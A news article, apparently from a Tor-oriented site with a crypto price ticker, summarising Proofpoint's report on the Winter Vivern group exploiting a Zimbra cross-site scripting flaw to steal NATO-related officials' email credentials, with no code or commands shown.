BTC $65266.0064
ETH $3170.2759
BNB $579.9567
SOL $151.5810
stETH $3170.3792
XRP $0.5307
DOGE $0.1622
TON $6.2152
ADA $0.5047
AVAX $37.5087
wstETH $3690.1011
WBTC $65350.8728
DOT $7.1858
WETH $3168.2550
TRX $0.1112
BCH $512.3933
LINK $14.9136
MATIC $0.7262
ICP $15.2978
UNI $7.8248
LTC $85.1449
DAI $1.0008
RNDR $9.1190
CAKE $2.9399
IMX $2.1935
STX $2.8650
ETC $27.9082
FDUSD $0.9998
MNT $1.2003
NEAR $6.3271
FIL $6.6129
OKB $55.7832
HBAR $0.0909
TAO $475.1056
VET $0.0423
WIF $3.0785
ATOM $8.6865
MKR $3070.6157
KAS $0.1185
FET $2.4759
GRT $0.2860
INJ $29.1371
PEPE $0.0000
USDE $0.9998
XLM $0.1150
THETA $2.2569
XMR $121.6010
BTC $65266.0064
ETH $3170.2759
BNB $579.9567
SOL $151.5810
stETH $3170.3792
XRP $0.5307
DOGE $0.1622
TON $6.2152
ADA $0.5047
AVAX $37.5087
wstETH $3690.1011
WBTC $65350.8728
DOT $7.1858
WETH $3168.2550
TRX $0.1112
BCH $512.3933
LINK $14.9136
MATIC $0.7262
ICP $15.2978
UNI $7.8248
LTC $85.1449
DAI $1.0008
RNDR $9.1190
CAKE $2.9399
IMX $2.1935
STX $2.8650
ETC $27.9082
FDUSD $0.9998
MNT $1.2003
NEAR $6.3271
FIL $6.6129
OKB $55.7832
HBAR $0.0909
TAO $475.1056
VET $0.0423
WIF $3.0785
ATOM $8.6865
MKR $3070.6157
KAS $0.1185
FET $2.4759
GRT $0.2860
INJ $29.1371
PEPE $0.0000
USDE $0.9998
XLM $0.1150
THETA $2.2569
XMR $121.6010
  • Catalog
  • Blog
  • Tor Relay
  • Jabber
  • One-Time notes
  • Temp Email
  • What is TOR?
  • We are in tor
  • Winter Vivern steals government letters through Zimbra vulnerability

    The researchers are sure that only the negligence of foreign “security guards” allowed hackers to take advantage of a security hole.

    The alleged Russian cybercriminal group, tracked under the code name TA473 or "Winter Vivern", has been actively exploiting vulnerabilities in unpatched Zimbra endpoints since February 2023 to steal emails from NATO officials, governments, military personnel and diplomats.

    Two weeks ago, SentinelLabs reported on the recent Winter Vivern operation, using sites impersonating European cybercrime agencies to distribute malware.

    Proofpoint today released a new report on how attackers are exploiting CVE-2022-27926 on Zimbra Collaboration servers to access communications from NATO-related organizations and individuals.

    Winter Vivern attacks begin with cybercriminals looking for unpatched (not updated to the latest version) Zimbra endpoints using the Acunetix vulnerability scanner. The hackers then send a phishing email from the hacked address. This letter is forged in such a way that the victim is sure that the sender is her friend or colleague.

     

    The emails contain a link that uses CVE-2022-27926 in the compromised Zimbra framework to inject malicious JavaScript into a web page. These scripts are then used to steal usernames, passwords, and tokens from cookies received from the compromised Zimbra endpoint. This information allows attackers to freely access the email accounts of the targets. “These blocks of JavaScript CSRF code are executed by the server hosting the vulnerable webmail instance,” Proofpoint explains in their report.

     

    In addition to three levels of base64 obfuscation applied to malicious JavaScript code for more complex analysis, "Winter Vivern" also leaves parts of legitimate JavaScript code mixed with normal operations and reduces the likelihood of detection.

     

    Finally, attackers can gain access to sensitive information on compromised email websites or retain control over messages for a period of time. In addition, hackers can use hacked accounts to carry out side phishing attacks and further infiltrate targeted organizations.

    Although the researchers state that the Winter Wyvern does not use particularly sophisticated methods, they maintain an efficient operational approach that works even against high-profile targets. The latest malware campaigns of this group clearly show why you should not delay software updates. After all, hackers exploited a vulnerability that was fixed in Zimbra Collaboration version 9.0.0 P24, released 10 months ago, in April 2022.

    Author DeepWeb
    New backdoor distribution method revealed
    Nexus gaining popularity in hacker forums

    Comments 0

    Add comment